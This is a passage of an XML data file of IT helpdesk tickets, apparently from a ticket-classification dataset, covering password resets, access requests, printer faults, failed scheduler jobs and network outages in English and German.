    <s v="vushymxe ifrbzdtl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to change password"/>
    <s v="unable to change password"/>
    <s v="sdgqujpr dtilnycz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="not able to login to sso : one team : it never worked "/>
    <s v="not able to login to sso : one team : it never worked _x000d__x000a_refer ticket : ticket_no0446943"/>
    <s v="fbwqocvh olapczwf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job SID_37hotf failed in job_scheduler at: 83.69.48.194 10:54:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_37hotf failed in job_scheduler at: 83.69.48.194 10:54:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="pc rqxw8515267 setup for remote company use cannot be logged in to, it appears the domain membership is broken."/>
    <s v="pc rqxw8515267 setup for remote company use cannot be logged in to, it appears the domain membership is broken."/>
    <s v="xweclugf qmhbjsyi"/>
    <x v="2"/>
  </r>
  <r>
    <s v="bdwdwarbara needs the permissions to save to the folder (srvlavstorage01)( j):toolroom/tooling documentation "/>
    <s v="bdwdwarbara needs the permissions to save to the folder (srvlavstorage01)( j):toolroom/tooling documentation "/>
    <s v="tfesaxip cvorpnth"/>
    <x v="11"/>
  </r>
  <r>
    <s v="needs access to server \\HostName_852\drafting\itar  to the user-wdwddw wwdyuan(yqddquanw), read only access"/>
    <s v="the name of the employee who needs access is wdwddw wwdyuan(yqddquanw), employee number 2807162637_x000a_the file is located on our operations drive (v drive)then sub file drafting, then sub file itar. this was set up by our own it guy before he was laid off"/>
    <s v="bkscnoqz umaojbci"/>
    <x v="11"/>
  </r>
  <r>
    <s v="need access to ess"/>
    <s v="need access to ess"/>
    <s v="jqhtkfsm xoehtbnl"/>
    <x v="19"/>
  </r>
  <r>
    <s v="engineering_tool installation"/>
    <s v="engineering_tool installation"/>
    <s v="mcphgvnb bdegqtyj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="EU_tool for plant plant_197 is working very slowly. please help here immediately. thanks"/>
    <s v="EU_tool for plant plant_197 is working very slowly. please help here immediately. "/>
    <s v="wckrxovs aunsgzmd"/>
    <x v="25"/>
  </r>
  <r>
    <s v="crm issue : ms ouutlook issue "/>
    <s v="crm issue : ms outlook issue "/>
    <s v="jartombc ghnxkmsl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user needs help to login to the mii."/>
    <s v="user needs help to login to the mii._x000d__x000a_"/>
    <s v="jnlzsubr cfgustlo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="EU_tool, pdv, batch management does not work "/>
    <s v="working with the systems is almost impossible. the processing of orders is no longer possible at the moment _x000d__x000a_das arbeiten mit den systemen ist fast nicht mÃ¶glich. das abarbeiten von auftrÃ¤gen ist zur zeit nicht mehr mÃ¶glich"/>
    <s v="hwxqoijt cotsgwrj"/>
    <x v="25"/>
  </r>
  <r>
    <s v="xvwchsdg pladjmxt - employee termination pn"/>
    <s v="gehe einmal davon aus das herr aurwddwacher zum ende oktober das unternehmen verlÃ¤sst bzw. in ruhestand/rente geht._x000a_ _x000a_im prozess der lÃ¶schung des accounts (ticketing_tool â€“ vorlage employee status termination) kann unter â€žspecial instuctrion&quot; eine sogenannte delegation angegeben werden._x000a_ _x000a_somit erhÃ¤lt derjenige dem die postfach delegiert wurde zugriff fÃ¼r einen bestimmten zeitraum._x000a_ _x000a_die vorlage wird normalerweise vom vorgesetzten / bzw. zustÃ¤ndigen hr-abteilung ausgefÃ¼llt und sollte mit beiden abgesprochen werden._x000a_"/>
    <s v="upiyobvj lwohuizr"/>
    <x v="32"/>
  </r>
  <r>
    <s v="please reset my SID_34 password  "/>
    <s v="_x000a__x000a_received from: azxhejvq.fyemlavd@gmail.com_x000a__x000a_userid waldjrrm667_x000a_"/>
    <s v="azxhejvq fyemlavd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user needs help to login to the collaboration_platform site."/>
    <s v="user needs help to login to the collaboration_platform site._x000d__x000a_-provided the user the email id and password after verifying the user details._x000d__x000a_-advised the user to try and login to the collaboration_platform._x000d__x000a_-user confirmed he is now able to login to the collaboration_platform._x000d__x000a_-issue resolved."/>
    <s v="ajzycbnu ntfvpsqu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account lockout"/>
    <s v="account lockout"/>
    <s v="wqfpkcgh vxtqeris"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook table view incorrect"/>
    <s v="outlook table view incorrect"/>
    <s v="ylqvitsk bfnackrw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="computer problem"/>
    <s v="_x000d__x000a__x000d__x000a_received from: uskydftv.sgwbfkjz@gmail.com_x000d__x000a__x000d__x000a_dear, i was not able to go on internet since this morning. an itbof germany was not able to log in. we have tried so much that the pasword is locked. i have the message: your password has expired and must be changed. please forward me the new password. "/>
    <s v="uskydftv sgwbfkjz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="design pane not showing up in &quot;analysis for ms excel&quot;"/>
    <s v="hello,_x000d__x000a__x000d__x000a_when i use analysis for ms excel now, i can't see the design pane even when option is turned on (refer to screenshot). i was able to see design pane earlier without problem. the only major change on my pc is recently i upgraded to office 2016 suite. can you please help bring my design pane back? "/>
    <s v="entuakhp xrnhtdmk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="browser issue : flash player and addins issue"/>
    <s v="browser issue : flash player and addins issue"/>
    <s v="csmhykge mpxbjudw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="not able to do pgi del. 9169653789- customer vale - co account assignments have different profit centers"/>
    <s v="not able to do pgi for delivery 9169653789- customer 81936871 - vale  -td order 35038980 . _x000d__x000a_itens 3546297-3 pieces /3546296-3 pieces/7150128-4 pieces/7150129-4 pieces . _x000d__x000a_urgente uacyltoe hxgaycze for customer _x000d__x000a__x000d__x000a_error - _x000d__x000a_co account assignments have different profit centers_x000d__x000a_message no. bk134_x000d__x000a__x000d__x000a_diagnosis_x000d__x000a_you entered multiple co account assignments objects assigned to different profit centers. in a document item, however, all co account assignments objects with profit center assignments must be assigned to the same profit center._x000d__x000a__x000d__x000a_procedure_x000d__x000a_if the message is an error message, check and change the co account assignments objects so that all objects with profit center assignments are assigned to the same profit center._x000d__x000a__x000d__x000a_in customizing, you can change this message from an error message to a warning message, a notification, or you can deactivate it completely. to do so, see the implementation guide (img) step under &quot;controlling: general -&gt; change message control&quot; (message class bk, message 134)._x000d__x000a_"/>
    <s v="jaeuqbvt orlhenfj"/>
    <x v="43"/>
  </r>
  <r>
    <s v="erp SID_34 account unlock and password reset"/>
    <s v="erp SID_34 account unlock and password reset"/>
    <s v="qidgvtwa qvbutayx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="bex analyzer report not working"/>
    <s v="i open bex analyzer and connect to SID_37_x000d__x000a_i try to open report [xhlg_pmm_atm] product management - master at m_x000d__x000a_the window to &quot;select values for variables&quot; appears, no available variants, data provider 1 is set to 1 for finance._x000d__x000a_i click ok, the system sits and does nothing.  eventually i get a &quot;microsoft excel not responding&quot; error._x000d__x000a__x000d__x000a_is there something wrong with the system?  is there something wrong with my settings?_x000d__x000a__x000d__x000a_i need to pull reports for an external auditor so it is rather urgent that i get this fixed quickly._x000d__x000a__x000d__x000a_"/>
    <s v="wgothrzl iokdftgn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="cannot print on usa printer prtqx4580 any longer.  please fix."/>
    <s v="cannot print on usa printer prtqx4580 any longer.  please fix."/>
    <s v="xzcwlqrv fjrdhiqt"/>
    <x v="2"/>
  </r>
  <r>
    <s v="unable to print from the printer qc0567"/>
    <s v="unable to print from the printer qc0567"/>
    <s v="lagqkmto xqtldrcs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i need to have k-rckf grind added to my microsoft email."/>
    <s v="no one has helped me with this. i am not sure why this was closed out when i had received no help?"/>
    <s v="raifstow gfeymtql"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user unable to connect at the companysecure  at office."/>
    <s v="user unable to connect at the companysecure  at office._x000a_-checked the network connection settings._x000a_-enabled the network connections._x000a_-updated the network drivers ._x000a_-updated the bios  on the pc._x000a_-restarted the pc._x000a_-user iformed he is ina  meeting and will call tomorrow._x000a__x000a_"/>
    <s v="nacrbmxo ptbjlxar"/>
    <x v="0"/>
  </r>
  <r>
    <s v="barcode Ã¼ber word etikettendruck "/>
    <s v="ich will im etikettendruck eine zahlen buchstaben drucken als barcode Ã¼ber word etikettendruck _x000a_mit der schriftart coSID_4428 geht dies nicht das ich es mit einer scanpistole lesen kann_x000a__x000a_phone: "/>
    <s v="cwrikael oanmsecr"/>
    <x v="41"/>
  </r>
  <r>
    <s v="job SID_37hotf failed in job_scheduler at: 83.69.48.194 07:43:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_37hotf failed in job_scheduler at: 83.69.48.194 07:43:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="folder access required"/>
    <s v="_x000a__x000a_received from: naruedlk.mpvhakdq@gmail.com_x000a__x000a_dear it team,_x000a__x000a_please usa read and write access on the following two folders to me (webr3gers45)._x000a__x000a__x000a_\\HostName_645\departments\personal&lt;file:///\\HostName_645\departments\personal&gt;_x000a__x000a_\\HostName_753\departments\pesonal&lt;file:///\\HostName_753\departments\pesonal&gt;_x000a__x000a_"/>
    <s v="naruedlk mpvhakdq"/>
    <x v="33"/>
  </r>
  <r>
    <s v="erp SID_34 account unlock and password reset"/>
    <s v="erp SID_34 account unlock and password reset"/>
    <s v="nmujidyk suylrqbi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1309 failed in job_scheduler at: 83.69.48.194 07:16:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1309 failed in job_scheduler at: 83.69.48.194 07:16:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="bitte user gogtyektdgwo richtig einstellen .nach anmeldung fehlen alle netzlaufwerke"/>
    <s v="bitte user gogtyektdgwo richtig einstellen .nach anmeldung fehlen alle netzlaufwerke"/>
    <s v="vzqomdgt jwoqbuml"/>
    <x v="11"/>
  </r>
  <r>
    <s v="called in to get in touch with ecwtrjnq jpecxuty"/>
    <s v="called in to get in touch with ecwtrjnq jpecxuty"/>
    <s v="gzjtweph mnslwfqv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vip1: account unlock"/>
    <s v="vip1: account unlock"/>
    <s v="tqjsmwvk arqoytbh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="support fÃ¼r roboworker \sandstrahlen \xwirzvda okhyipgr"/>
    <s v="support fÃ¼r roboworker \sandstrahlen \xwirzvda okhyipgr"/>
    <s v="xwirzvda okhyipgr"/>
    <x v="24"/>
  </r>
  <r>
    <s v="setup new ws \lndypaqg dhqwtcsr"/>
    <s v="setup new ws \lndypaqg dhqwtcsr"/>
    <s v="lndypaqg dhqwtcsr"/>
    <x v="24"/>
  </r>
  <r>
    <s v="ticket update for-ticket_no0447000"/>
    <s v="ticket update for-ticket_no0447000"/>
    <s v="gzjtweph mnslwfqv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="circuit outage:india -admin-4503-core-sw01 is down.at 6:27 am et on 10/20."/>
    <s v="circuit outage:india -admin-4503-core-sw01 is down.at 6:27 am et on 10/20."/>
    <s v="bozdftwx smylqejw"/>
    <x v="7"/>
  </r>
  <r>
    <s v="circuit outage: company-ap-ind-telecom_vendor_1-dmvpn-2921-rtr01 is down since 83.69.48.194 6:26 am et. site is up telecom_vendor_3."/>
    <s v="what type of outage:  _____network     ___x__circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____yes_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _____ 83.69.48.194 6:26 am et____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x v="7"/>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iwqfelcu gsubfiml"/>
    <x v="0"/>
  </r>
  <r>
    <s v="telefon im &quot;meeting room 3&quot; telefonnummer 263 in germany funktioniert der klingelton nicht."/>
    <s v="wenn jemand von auÃŸerhalb anruft dann klingelt das telefon nicht. bitte mal nachschauen, danke."/>
    <s v="fhzeoyws gudfnirz"/>
    <x v="32"/>
  </r>
  <r>
    <s v="unable to launch outlook"/>
    <s v="unable to launch outlook"/>
    <s v="iuoavmpx suojykvf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp access issue"/>
    <s v="system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): pm!_x000d__x000a__x000d__x000a_enter user id of user having the issue: mathes_x000d__x000a__x000d__x000a_transaction code(s) the user needs or was working with:_x000d__x000a__x000d__x000a_describe the issue: please reset the password. if required, please unlock the id._x000d__x000a__x000d__x000a_if you are getting a &quot;not authorized&quot; message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket._x000d__x000a__x000d__x000a_provide access the same as this other user:"/>
    <s v="waekugzo dwzfghqo"/>
    <x v="19"/>
  </r>
  <r>
    <s v="erp account locked"/>
    <s v="_x000d__x000a__x000d__x000a_received from: uexodhqa.txqoifsl@gmail.com_x000d__x000a__x000d__x000a_dear team,_x000d__x000a__x000d__x000a_my erp account got locked because of wrong password attempt._x000d__x000a__x000d__x000a_please support to get unlock the same._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="uexodhqa txqoifsl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_593 failed in job_scheduler at: 83.69.48.194 05:42:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_593 failed in job_scheduler at: 83.69.48.194 05:42:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="erp printing - !production order! printer mp7456 replacement"/>
    <s v="production order printer mp7456 is being replaced._x000a__x000a_- remove rerouting from mp7456 to mp82 on erp systems_x000a_-------------------------------------------------------------------------------------------------------------------------_x000a_printer replacement_x000a__x000a_*you will need to have power / network connectivity and the printer installed - ready before a ticketing_tool ticket can be opened. do you have all 3 requirements above satisfied? (yes / no)? yes_x000a__x000a_*replacing erp printer name (e.g. hq01, id02, wy61)? mp7456 ( name stays the same)_x000a__x000a_*ip address s if known? 10.16.77.214 (ip stays the same)_x000a__x000a_*make/model of the replacement erp printer? hp laserjet 500 m575f_x000a__x000a_*what erp printer do you currently use (e.g. hq01, id02, wy61)? -_x000a__x000a_*list the erp system the printer needs to be defined? erp (SID_1,SID_21,SID_34, SID_37, SID_39, SID_38, hrp, plm etcâ€¦)? hrp,SID_34, plm (same as old mp7456)_x000a__x000a_*what is currently printed on these printers from erp (e.g. inwarehouse_tools, delivery notes etc..)? same as old mp7456_x000a__x000a_*location of install: country / city / building / floor / cubicle? same as old mp7456_x000a__x000a_*local it site contact name? xvwchsdg pladjmxt_x000a__x000a_optional: printer serial number / printer mac address? serial: cnctf6418t_x000a__x000a_"/>
    <s v="xvwchsdg pladjmxt"/>
    <x v="4"/>
  </r>
  <r>
    <s v="HostName_1030 is currently experiencing high cpu utilization. please investigate!"/>
    <s v="HostName_1030 is currently experiencing high cpu utilization. please investigate!"/>
    <s v="jloygrwh acvztedi"/>
    <x v="11"/>
  </r>
  <r>
    <s v="hedjdbwlmut.nwwiebler called regarding a folder access query"/>
    <s v="hedjdbwlmut.nwwiebler called regarding a folder access query"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="folder read and write access needed"/>
    <s v="_x000d__x000a__x000d__x000a_received from: unzfipac.opwzmlbc@gmail.com_x000d__x000a__x000d__x000a_dear colleagues,_x000d__x000a__x000d__x000a_please usa access to this path for me for read and write access:_x000d__x000a__x000d__x000a_t:\corpbusinessdev\monthly financial review_x000d__x000a__x000d__x000a_"/>
    <s v="unzfipac opwzmlbc"/>
    <x v="33"/>
  </r>
  <r>
    <s v="activation of outlook email access on iphone 7 device for awddmwdol mwddwansuke"/>
    <s v="_x000a__x000a_received from: kbclinop.vsczklfp@gmail.com_x000a__x000a_hi,_x000a_please usa email access on new iphone 7 device for our indirect channel manager, information as follow :_x000a__x000a_email: ecxwnmqi.pztiqjuh@gmail.com&lt;mailto:ecxwnmqi.pztiqjuh@gmail.com&gt;_x000a_manager's name : sqqqd zlkmlwdwdade &amp; nidqknwjktin dewkiodshpande_x000a__x000a_is this device company owned?  yes_x000a__x000a_is this a replacement of your old device?  yes, as the existing old samsung phone is faulty._x000a__x000a_"/>
    <s v="kbclinop vsczklfp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="access issue to ess"/>
    <s v="_x000a__x000a_received from: ihkolepb.ozhnjyef@gmail.com_x000a__x000a_hello,_x000a__x000a_one of the temperory workmen-nxcfastp xnwtyebg  whose user id is vvandwkjis   is not able to login to ess as his user id locked.  he is a kiosk user.  please  re-set his password and confirm._x000a__x000a__x000a__x000a_"/>
    <s v="ihkolepb ozhnjyef"/>
    <x v="0"/>
  </r>
  <r>
    <s v="probleme mit barcode etiketten \volume format zu groÃŸ \vzqomdgt jwoqbuml"/>
    <s v="obleme mit barcode etiketten \volume format zu groÃŸ \vzqomdgt jwoqbuml"/>
    <s v="vzqomdgt jwoqbuml"/>
    <x v="24"/>
  </r>
  <r>
    <s v="setup new ws in br \usalikfj lfmpxbcn"/>
    <s v="setup new ws in br \usalikfj lfmpxbcn"/>
    <s v="usalikfj lfmpxbcn"/>
    <x v="24"/>
  </r>
  <r>
    <s v="der monitor an unser lÃ¤ngenmessmaschine ist defekt ."/>
    <s v="guten morgen hkydrfdw,_x000a__x000a_der monitor an unser lÃ¤ngenmessmaschine ist defekt._x000a_bitte kurzfristig einen ersatzmonitor bereitstellen._x000a_danke_x000a_"/>
    <s v="ctbsupdy auhocbli"/>
    <x v="24"/>
  </r>
  <r>
    <s v="fregabe fÃ¼r ordner applications wurde gekappt???"/>
    <s v="bitte wieder freigeben"/>
    <s v="lzpuyrvw zkxbacvn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reinstall eagl9111361 from scratch - device chrashes when entering stand by mode"/>
    <s v="reinstall eagl9111361 from scratch - device chrashes when entering stand by mode"/>
    <s v="jksgwdyi greuqxko"/>
    <x v="28"/>
  </r>
  <r>
    <s v="restore"/>
    <s v="_x000a__x000a_received from: trgqbeax.hfyzudql@gmail.com_x000a__x000a_please restore the complete file_x000a__x000a_HostName_598/hr_fd/mitarbeiter/azubis/â€¦_x000a__x000a_including all files under azubis_x000a__x000a__x000a_danke + viele grÃ¼ÃŸe_x000a_trgqbeax hfyzudql_x000a_"/>
    <s v="trgqbeax hfyzudql"/>
    <x v="11"/>
  </r>
  <r>
    <s v="job Job_1378 failed in job_scheduler at: 83.69.48.194 04:28:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1378 failed in job_scheduler at: 83.69.48.194 04:28:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="printer not working. "/>
    <s v="_x000d__x000a__x000d__x000a_received from: yhmzxcia.heszapvl@gmail.com_x000d__x000a__x000d__x000a_hi it,_x000d__x000a__x000d__x000a_please help to resolve our sg004 printer problem.  the printer is fine after printer technician check, it is to do with our cable and server ports in the server room._x000d__x000a__x000d__x000a_we admin have no knowledge and capability to handle that. please have someone to help aerp._x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="yhmzxcia heszapvl"/>
    <x v="18"/>
  </r>
  <r>
    <s v="EU_tool, pls and wqw are working very slow."/>
    <s v="EU_tool, pls and wqw are working very slow."/>
    <s v="jltebswi zmvohjws"/>
    <x v="25"/>
  </r>
  <r>
    <s v="schreibrechte fÃ¼r ksdvp3, ce_leiter"/>
    <s v="schreibrechte fÃ¼r ksdvp3, ce_leiter"/>
    <s v="nemzycxb xpsgkahw"/>
    <x v="33"/>
  </r>
  <r>
    <s v="on the english forms we are printing german instead of english"/>
    <s v="there was a change in bank details made with ticket_no1557889.  this is not correctly printing on the english forms.  it is showing the correct data but the &quot;descriptions&quot; are in german. example. &quot;bankverbindung instead of bank address,  konto nummer instead of account number&quot;  i also see that there is an extra text being printed for the customers --   &quot;bitte beachten sie unsere neue bankverbindung.&quot; &quot;please note our new bank account details.&quot;   only the english version should print on the english documents, not both german and english."/>
    <s v="ujxvrlzg pkaegicn"/>
    <x v="12"/>
  </r>
  <r>
    <s v="EU_tool jobs again not running, please help immediately"/>
    <s v="released orders do not make it into the &quot;to-do-list&quot;, please check the status and restart the system"/>
    <s v="qmhikdzl zatcorjd"/>
    <x v="25"/>
  </r>
  <r>
    <s v="is skype down?"/>
    <s v="_x000a__x000a_received from: lenxvcbq.vwnhjtoi@gmail.com_x000a__x000a_i am not able to get into skype right now. is there an outage?_x000a__x000a__x000a__x000a_"/>
    <s v="lenxvcbq vwnhjtoi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="whenever i fill in any amount money into erp, it show me only 1rmb finally in the system."/>
    <s v="whenever i fill in any amount money into erp, it show me only 1rmb finally in the system. please contact withn me aerp._x000a_my phone : "/>
    <s v="facrghdv velfjros"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1388 failed in job_scheduler at: 83.69.48.194 03:26:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1388 failed in job_scheduler at: 83.69.48.194 03:26:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="SID_1 - configair server responds with &quot; 500   internal server error&quot; in case of any other logon language than &quot;en&quot;."/>
    <s v="configair server responds with &quot; 500   internal server error&quot; in case of any other logon language then &quot;en&quot; and the model &quot;csewdwdwdndmill&quot; is used. the issue exists in erp erp system SID_1 as well as on uacyltoe hxgayczedistributor_tool / uacyltoe hxgayczecompany center - quality environment.._x000a_further error message text is &quot;  error: while trying to invoke the method java.util.list.iterator() of a null object loaded from local variable 'locallist'&quot;._x000a_logon language &quot;en&quot; is ok. if our &quot;csscdddwsawdrill&quot; model is used all language seem to be working fine. but once the user changes to any other language (e.g. de or it) and uses the model csewdwdwdndmill the configig air system responses with the error message during starting process of configair configurator."/>
    <s v="rednkluh lrpyvcxs"/>
    <x v="13"/>
  </r>
  <r>
    <s v="job pp_EU_tool_netch_ap1 failed in job_scheduler at: 83.69.48.194 02:54:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job pp_EU_tool_netch_ap1 failed in job_scheduler at: 83.69.48.194 02:54:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="unable to create delivery [urgent]"/>
    <s v="plant_304 have 5pcs cannot created d/n for mm#6295171.our customer is very urgent this goods._x000d__x000a_would you please help sloved? _x000d__x000a__x000d__x000a_"/>
    <s v="mgpfntcl mjoigcdb"/>
    <x v="5"/>
  </r>
  <r>
    <s v="backup data"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ucdwyxko.apktrsyq@gmail.com_x000d__x000a__x000d__x000a_dear sir,_x000d__x000a_by mistake one of the folder in HostName_95/rk/7116 has been deleted._x000d__x000a_requesting you to retrieve the same._x000d__x000a__x000d__x000a_with best "/>
    <s v="ucdwyxko apktrsyq"/>
    <x v="11"/>
  </r>
  <r>
    <s v="SID_34 - purchase requisition approval issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: izwtdnfq.xptuoaid@gmail.com_x000d__x000a__x000d__x000a_hi it team,_x000d__x000a__x000d__x000a_i cannot approve pr via the link provided. i only enable to approve directly in erp via me55._x000d__x000a__x000d__x000a_kindly fix for me. "/>
    <s v="izwtdnfq xptuoaid"/>
    <x v="29"/>
  </r>
  <r>
    <s v="seit 20.10.2016 06:00mesz serverprobleme qmsoft nicht anwendbar."/>
    <s v="seit 20.10.2016 06:00mesz serverprobleme qmsoft nicht anwendbar."/>
    <s v="qkedpfyj qechgaty"/>
    <x v="25"/>
  </r>
  <r>
    <s v="ibm pmr#902s9kr:problem report from pwr8hmc1.hq.company.com"/>
    <s v="_x000a_from:  toolonicserviceagent_pwr8hmc1@pwr8hmc1.hq.company.com_x000a_sent: wednesday, october 19, 2016 9:54 pm_x000a_to: _x000a_subject: problem report from pwr8hmc1.hq.company.com_x000a__x000a_reporting system: pwr8hmc1_x000a_machine type-model/serial: 8284-22a/21e435v problem number: 101_x000a_error: b4141118_x000a_description: management console to fsp,bpa, or bpc failure detected last occurred: 10/19/16 9:40 pm current status:  _x000a_pmr number: n/a_x000a_details:  _x000a_"/>
    <s v="jloygrwh acvztedi"/>
    <x v="46"/>
  </r>
  <r>
    <s v="reset the password for arsbtkvd qieagkos on erp / production / erp"/>
    <s v="_x000d__x000a__x000d__x000a_received from: arsbtkvd.qieagkos@gmail.com_x000d__x000a__x000d__x000a_good day!_x000d__x000a_could you please reset password for erp?_x000d__x000a__x000d__x000a_"/>
    <s v="arsbtkvd qieagkos"/>
    <x v="0"/>
  </r>
  <r>
    <s v="not able to add lean project into collaboration_platform"/>
    <s v="_x000a__x000a_received from: jhyazros.azdxonjg@gmail.com_x000a__x000a_[cid:image001.png@01d22ab4.97030051]_x000a__x000a_jkddwkwd.ngtr_x000a_assistant manager- manufacturing_x000a_company india limited_x000a_jhyazros.azdxonjg@gmail.com_x000a__x000a__x000a__x000a_"/>
    <s v="jhyazros azdxonjg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="prints (business_client)"/>
    <s v="_x000a__x000a_received from: vciknubg.wdlkabms@gmail.com_x000a__x000a_request access to get prints.  my id# is 21164311127._x000a__x000a_"/>
    <s v="vciknubg wdlkabms"/>
    <x v="19"/>
  </r>
  <r>
    <s v="can't log in ticketing_tool "/>
    <s v="_x000a__x000a_received from: zuxcfonv.nyhpkrbe@gmail.com_x000a__x000a_gso_x000a__x000a_user qzkyugce etsmnuba ( dondwdgj76) can't log on the ticketing_tool , the system display the user and password invalid , could you work on this ,"/>
    <s v="zuxcfonv nyhpkrbe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="network outage:cantabria (mecftgobusa) - (kenci) hard down since 10:01 pm on 10/19 et.site has no backup circuit"/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _______10:01 pm on 10/19 et_______________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? ___na____    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? ___na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na______     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   ______na_____   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    _____na______    (yes/no/na) _x000d__x000a__x000d__x000a_10. verified site working on backup circuit ?  __na_____     (yes/no/na) _x000d__x000a__x000d__x000a_11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    _________na________________       _x000d__x000a__x000d__x000a_12. notified  gsc  _____na___     (yes/no/na)    cert started  ?________    (yes/no/na) _x000d__x000a__x000d__x000a_13.  additional diagnostics"/>
    <s v="jloygrwh acvztedi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job SID_37stat failed in job_scheduler at: 10/19/2016 22:11:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_37stat failed in job_scheduler at: 10/19/2016 22:11:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="1"/>
  </r>
  <r>
    <s v=" mm # 2639483 iak-urgent"/>
    <s v="from: kwddwdw hudfefwe _x000a_sent: thursday, october 20, 2016 7:31 am_x000a_to: nwfodmhc exurcwkm_x000a_cc: rxoynvgi ntgdsehl; gzawrocy shbgwxeparamdnty_x000a_subject::fw: mm # 2639483 iak-urgent_x000a__x000a_it help,_x000a__x000a_please help check , it's urgent._x000a__x000a_din,_x000a__x000a_in future please raise such issue to our it as well._x000a__x000a_ap logistics manager_x000a_e: ovhtgsxd.dcqhnrmy@gmail.com_x000a__x000a_from: rxoynvgi ntgdsehl _x000a_sent: thursday, october 20, 2016 9:21 am_x000a_to: gzawrocy shbgwxeparamdnty; johthryugftyson hu_x000a_cc:  kmvwxdti uaoyhcep; _x000a_subject: re: mm # 2639483 iak_x000a__x000a_hi morning ,_x000a__x000a_this issue still not solve yet, i still encounter same issue the net weight higher than gross weight._x000a__x000a_net weight 4777.1000 kgs and physical gross weight 5.000 kgs but in erp SID_34 vl03n shown it is correct._x000a__x000a_attached for your reference._x000a__x000a_hi morning, _x000a__x000a_need your advice on this issue._x000a__x000a_this is issue happen since last thursday still not solve yet. _x000a__x000a_attached email flow for your reference._x000a__x000a_ksjfye fekfeealleh_x000a_operation supervisor_x000a_email : rxoynvgi.ntgdsehl@gmail.com_x000a__x000a__x000a_from: _x000a_sent: wednesday, october 19, 2016 7:20 pm_x000a_to: gzawrocy shbgwxeparamdnty_x000a_cc: kmvwxdti uaoyhcep; rxoynvgi ntgdsehl_x000a_subject: aw: mm # 2639483 iak_x000a__x000a_hello ,_x000a__x000a_itÂ´s done._x000a__x000a_have a nice day_x000a__x000a_mit freundlichen grÃ¼ÃŸen_x000a_best "/>
    <s v="ovhtgsxd dcqhnrmy"/>
    <x v="17"/>
  </r>
  <r>
    <s v="the note which was always printed at bottom of the quotation was missing. please help to put it back."/>
    <s v="please see attachment, "/>
    <s v="tfazwrdv upwonzvd"/>
    <x v="12"/>
  </r>
  <r>
    <s v="erp locked"/>
